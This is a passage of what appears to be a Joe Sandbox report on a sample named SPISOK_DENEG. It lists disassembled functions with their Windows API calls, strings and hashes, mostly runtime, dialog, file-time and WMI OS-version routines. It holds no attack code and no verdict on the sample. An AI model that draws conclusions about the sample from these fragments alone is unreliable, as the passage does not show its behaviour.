                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 57cc2d8e05c514f2fb4866aeb5be1519efb0c8862dee31fd12620e269fb361fe
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: F731E7B1B147468FCB54DF29C8511AEBBE0FB95304F50452DE895D7342CB35EA0ACB91
                                                            Function 000DE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000DE30E
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                              • Part of subcall function 000E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00111030,00000200,000DD928,00000000,?,00000050,00111030), ref: 000E1DC4
                                                            • _strlen.LIBCMT ref: 000DE32F
                                                            • SetDlgItemTextW.USER32(?,0010E274,?), ref: 000DE38F
                                                            • GetWindowRect.USER32(?,?), ref: 000DE3C9
                                                            • GetClientRect.USER32(?,?), ref: 000DE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 000DE475
                                                            • GetWindowRect.USER32(?,?), ref: 000DE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 000DE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 000DE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 000DE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 000DE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 000DE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: 7f02475ec845530d50079b04f05b48bab1acd59c79da8bdaedcb2d615908d58e
                                                            • Instruction ID: e523bea43e48088a20c27f3b2881d4997b78153dd3ec7e14c577249f835924e4
                                                            • Opcode Fuzzy Hash: 7f02475ec845530d50079b04f05b48bab1acd59c79da8bdaedcb2d615908d58e
                                                            • Instruction Fuzzy Hash: B881C271208341AFD710DF68CD88A6FBBE8FB88704F04091EFA94E7291D775E9058B62
                                                            Function 000FCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 000FCB66
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC71E
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC730
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC742
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC754
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC766
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC778
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC78A
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC79C
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7AE
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7C0
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7D2
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7E4
                                                              • Part of subcall function 000FC701: _free.LIBCMT ref: 000FC7F6
                                                            • _free.LIBCMT ref: 000FCB5B
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000FCB7D
                                                            • _free.LIBCMT ref: 000FCB92
                                                            • _free.LIBCMT ref: 000FCB9D
                                                            • _free.LIBCMT ref: 000FCBBF
                                                            • _free.LIBCMT ref: 000FCBD2
                                                            • _free.LIBCMT ref: 000FCBE0
                                                            • _free.LIBCMT ref: 000FCBEB
                                                            • _free.LIBCMT ref: 000FCC23
                                                            • _free.LIBCMT ref: 000FCC2A
                                                            • _free.LIBCMT ref: 000FCC47
                                                            • _free.LIBCMT ref: 000FCC5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 6700c56bc1b832127a7d7c800ac46038db7692d81715c90cbbbfc1a50a60f4b8
                                                            • Instruction ID: ce0993fd6a8747834229095c70413894cc79aa574e6697afd8485cd4ae9d72ed
                                                            • Opcode Fuzzy Hash: 6700c56bc1b832127a7d7c800ac46038db7692d81715c90cbbbfc1a50a60f4b8
                                                            • Instruction Fuzzy Hash: 66316D3160030D9FEB64AA38DA46FBA77E9AF11350F148429E688D7992DF34AC40EB50
                                                            Function 000E9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000E9736
                                                            • _wcslen.LIBCMT ref: 000E97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 000E97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 000E9806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000E982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 19cf9c3c309aea8d7d6084ed103e315a3304f2d9e9b5472a6748a6958db35e96
                                                            • Instruction ID: 313a013e4a48f8e910e3895b4393e49a868c57618962844ca53b3ed1ab62890d
                                                            • Opcode Fuzzy Hash: 19cf9c3c309aea8d7d6084ed103e315a3304f2d9e9b5472a6748a6958db35e96
                                                            • Instruction Fuzzy Hash: 613128321083557FD725AB269C46FAF779CAF52320F14011DF641A61D3EFA49A0983A6
                                                            Function 000ED69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 000ED6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 000ED6ED
                                                              • Part of subcall function 000E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000DC116,00000000,.exe,?,?,00000800,?,?,?,000E8E3C), ref: 000E1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000ED709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 000ED720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 000ED734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 000ED75D
                                                            • DeleteObject.GDI32(00000000), ref: 000ED764
                                                            • GetWindow.USER32(00000000,00000002), ref: 000ED76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: 4b6bdb871d183d59256dd24bdb1892b8aebf245fa158302c05bb6ce0a92b6c1c
                                                            • Instruction ID: 9b33789a8e4b91f9964e2a079987aaa3af3ebd5ffadf29b982dae569657d5ead
                                                            • Opcode Fuzzy Hash: 4b6bdb871d183d59256dd24bdb1892b8aebf245fa158302c05bb6ce0a92b6c1c
                                                            • Instruction Fuzzy Hash: 07110A722087907FE3216B729C4AFEF769CEF45711F004122FAA1B10D2EB64CB4546B9
                                                            Function 000F96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 000F9705
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000F9711
                                                            • _free.LIBCMT ref: 000F971C
                                                            • _free.LIBCMT ref: 000F9727
                                                            • _free.LIBCMT ref: 000F9732
                                                            • _free.LIBCMT ref: 000F973D
                                                            • _free.LIBCMT ref: 000F9748
                                                            • _free.LIBCMT ref: 000F9753
                                                            • _free.LIBCMT ref: 000F975E
                                                            • _free.LIBCMT ref: 000F976C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 80d4257db24323e65d2d5b1c84459cd02914412a343dc845a4ded0ebc18f236a
                                                            • Instruction ID: 2465527867f248035630bc46b9cb12c32e3f1e5a301a02e1c5e2e307be8e6294
                                                            • Opcode Fuzzy Hash: 80d4257db24323e65d2d5b1c84459cd02914412a343dc845a4ded0ebc18f236a
                                                            • Instruction Fuzzy Hash: 2511A47611010DAFCB01EF54C942DE93BB5EF15390B5195A1FB088FA62DE32DA50EB84
                                                            Function 000F2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: e00556efb0dafd5f01f1974a2c0c54ebc7b06a700439c315a769e9fc614db4a8
                                                            • Instruction ID: 950f9c0f0fa18d338cef890f4d0624ea1137b78b1d2f883942904d5add35e017
                                                            • Opcode Fuzzy Hash: e00556efb0dafd5f01f1974a2c0c54ebc7b06a700439c315a769e9fc614db4a8
                                                            • Instruction Fuzzy Hash: 04B17A7180020DEFCF29DFA4C8819BEBBB5FF04320F14416AEA016BA12D735DA55EB91
                                                            Function 000D6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D6FAA
                                                            • _wcslen.LIBCMT ref: 000D7013
                                                            • _wcslen.LIBCMT ref: 000D7084
                                                              • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
                                                              • Part of subcall function 000D7A9C: GetLastError.KERNEL32 ref: 000D7AF1
                                                              • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: e3e3fbfff115b33580639f86f666c320c7432700d07f18d7a618af8f8b1d040f
                                                            • Instruction ID: 2fb5f73c0a68443c58650f241d5e1d3a2208b690476662bf50c536c486c22ae3
                                                            • Opcode Fuzzy Hash: e3e3fbfff115b33580639f86f666c320c7432700d07f18d7a618af8f8b1d040f
                                                            • Instruction Fuzzy Hash: E341D6B1D08348BAEB30E7749D42FEE77AC9F15304F004557FA59A62C3E7756A888631
                                                            Function 000EB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000EB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 000EB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 000EB650
                                                            • SetWindowTextW.USER32(?,?), ref: 000EB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 000EB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 000EB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 000EB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: c7713995ace0877b89f5e3df3a15036fdf5e757b531db83f086c9bb4637e86a9
                                                            • Instruction ID: e2ae3d6ef72703eb9a89a9b25c7d209532dbe9387f70c64453b4e1ee73da71e7
                                                            • Opcode Fuzzy Hash: c7713995ace0877b89f5e3df3a15036fdf5e757b531db83f086c9bb4637e86a9
                                                            • Instruction Fuzzy Hash: 15212732204244BFD2216F77ED49F7B3BBCEB4AB51F010018F600B69E0CB6699929635
                                                            Function 000EFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C85E95ED,00000001,00000000,00000000,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 000EFE1F
                                                            • _com_issue_error.COMSUPP ref: 000EFE48
                                                            • _com_issue_error.COMSUPP ref: 000EFE52
                                                            • GetLastError.KERNEL32(80070057,C85E95ED,00000001,00000000,00000000,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFE57
                                                            • _com_issue_error.COMSUPP ref: 000EFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,000DAF6C,ROOT\CIMV2), ref: 000EFE80
                                                            • _com_issue_error.COMSUPP ref: 000EFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: ec7b105ba44c2eed1a594fa92f3ec0f0b8b5609c37b21c1178ff15a16aad9620
                                                            • Instruction ID: c3d35ee20e631aa7a5127b65b92f8ac08ecafaf4a205ef98edec84fc165b7530
                                                            • Opcode Fuzzy Hash: ec7b105ba44c2eed1a594fa92f3ec0f0b8b5609c37b21c1178ff15a16aad9620
                                                            • Instruction Fuzzy Hash: 7041F871A0024AAFC7109F66CC45BBEBBE9EB48710F20423AF915F7792D774A94087A1
                                                            Function 000DAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 1605d25193a7358ebf941f42b9874d50dd1d2d1ecc8bbd5118171a8f43edd124
                                                            • Instruction ID: 307805cbe00d7d69259afec62ff45d401dd9177b8e6b0f77d59f38b8758cd7fc
                                                            • Opcode Fuzzy Hash: 1605d25193a7358ebf941f42b9874d50dd1d2d1ecc8bbd5118171a8f43edd124
                                                            • Instruction Fuzzy Hash: 7A714A71B00319EFDB14DFA4C8959AEBBB9FF49710B14015AE552A73A0CB70AE42CB60
                                                            Function 000D9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000D93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000D93C9
                                                              • Part of subcall function 000DC29A: _wcslen.LIBCMT ref: 000DC2A2
                                                              • Part of subcall function 000E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000DC116,00000000,.exe,?,?,00000800,?,?,?,000E8E3C), ref: 000E1FD1
                                                            • _swprintf.LIBCMT ref: 000D9465
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 000D94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 000D9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 75821826767e8d05492720dd9ec643d1b5bf67fbb233076c5f1bf561800092b4
                                                            • Instruction ID: ebec20a3dd31919a00da0cffd0ab8cf4838cda6d7e8afaf8aa6af42f736693bc
                                                            • Opcode Fuzzy Hash: 75821826767e8d05492720dd9ec643d1b5bf67fbb233076c5f1bf561800092b4
                                                            • Instruction Fuzzy Hash: 134163719003596ADF61ABA0DC45EEE737CAF45340F0088A6B649E3256DB788BC9CB70
                                                            Function 000E1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 000E122E
                                                              • Part of subcall function 000DB146: GetVersionExW.KERNEL32(?), ref: 000DB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 000E1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 000E1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000E1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000E12CF
                                                            • __aullrem.LIBCMT ref: 000E1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
